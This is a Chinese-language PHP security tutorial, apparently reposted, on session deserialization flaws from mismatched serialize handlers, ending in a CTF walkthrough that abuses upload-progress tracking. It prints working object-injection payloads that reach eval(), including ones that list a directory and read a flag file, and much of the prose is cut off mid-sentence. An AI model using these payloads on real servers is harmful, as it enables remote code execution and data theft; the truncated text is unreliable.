本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于session反序列化漏洞的相关问题,就是序列化存储Session数据与反序列化读取Session数据的方式不同导致Session反序列化漏洞,希望对大家有帮助。
|
本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于session反序列化漏洞的相关问题,就是序列化存储Session数据与反序列化读取Session数据的方式不同导致Session反序列化漏洞,希望对大家有帮助。
推荐学习:《PHP视频教程》 PHP session反序列化漏洞PHP 什么是session官方
因为HTTP的无状态性,服务端产生了 本质上, PHP session工作流程以PHP为例,理解
具体原理图:
php.ini session配置
session.save_path="/tmp" --设置session文件的存储位置 session.save_handler=files --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数 session.auto_start= 0 --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动 session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用php session.upload_progress.enabled= On --启用上传进度跟踪,并填充$ _SESSION变量,默认启用 session.upload_progress.cleanup= oN --读取所有POST数据(即完成上传)后立即清理进度信息,默认启用 PHP session序列化机制根据
php处理器首先来看看默认 <?php//ini_set('session.serialize_handler','php');session_start();$_SESSION['name'] = $_GET['name'];echo $_SESSION['name'];?>
为了方便查看,将
1、文件名 文件名为 2、文件内容 php处理器存储格式
php_binary处理器使用php_binary处理器,即 <?phpini_set('session.serialize_handler','php_binary');session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];echo $_SESSION['namenamenamenamenamenamenamenamename'];?>由于三种方式
php_serialize 处理器使用php_binary处理器,即 <?phpini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['name'] = $_GET['name'];echo $_SESSION['name'];?>文件内容即经过 serialize() 函数反序列处理的数组,
session的反序列化漏洞利用session的反序列化漏洞,就是利用 漏洞成因首先创建 <?phpini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['session'] = $_GET['session'];echo $_SESSION['session'];?>
<?phpsession_start();class f4ke{
public $name;
function __wakeup(){
echo "Who are you?";
}
function __destruct(){
eval($this->name);
}}$str = new f4ke();?>接着,我们构建URL进行访问 http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
打开 a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
漏洞分析:
我们访问
CTF例题:PHPINFO<?php//A webshell is wait for youini_set('session.serialize_handler', 'php');session_start();class OowoO{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}}if(isset($_GET['phpinfo'])){
$m = new OowoO();}else{
highlight_string(file_get_contents('index.php'));}?>我们可以看到
可见 补充知识
那么我们如何找到代码入口将利用代码写入到 补充知识 当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,
下面是官方给出的一个文件上传时监测进度例子: <form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /> <input type="file" name="file1" />
<input type="file" name="file2" />
<input type="submit" /></form>其中 在session中存储的上传进度,如下所示: <?php$_SESSION["upload_progress_123"] = array( "start_time" => 1234567890, // The request time 请求时间 "content_length" => 57343257, // POST content length 长度 "bytes_processed" => 453489, // Amount of bytes received and processed 已接收字节 "done" => false, // true when the POST handler has finished, successfully or not 是否上传完成 "files" => array(//上传的文件 0 => array( "field_name" => "file1", // Name of the <input/> field input中设定的变量名 // The following 3 elements equals those in $_FILES "name" => "foo.avi", //文件名 "tmp_name" => "/tmp/phpxxxxxx", "error" => 0, "done" => true, // True when the POST handler has finished handling this file "start_time" => 1234567890, // When this file has started to be processed "bytes_processed" => 57343250, // Amount of bytes received and processed for this file ), // An other file, not finished uploading, in the same request 1 => array( "field_name" => "file2", "name" => "bar.avi", "tmp_name" => NULL, "error" => 0, "done" => false, "start_time" => 1234567899, "bytes_processed" => 54554, ), )); 其中,session中的 下面我们就开始解题拿到flag 首先,
session.upload_progress.enabled = On --表明允许上传进度跟踪,并填充$ _SESSION变量 session.upload_progress.cleanup = Off --表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量) 即允许上传进度跟踪且结束后不清除数据,更有利使用 构造 <form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /> <input type="file" name="file" /> <input type="submit" /></form> 构造序列化字符串作为 <?phpclass OowoO{
public $mdzz='print_r(scandir(dirname(__FILE__)));';}$obj = new OowoO();echo serialize($obj);?>//O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}为了防止 随意选择文件,点击表单提交,使用抓包工具
并修改 |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}发送请求包,代码执行过程分析:
因此直接执行
构造最终 |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}
推荐学习:《PHP视频教程》 以上就是详细介绍PHP的session反序列化漏洞的详细内容,更多请关注模板之家(www.mb5.com.cn)其它相关文章! |
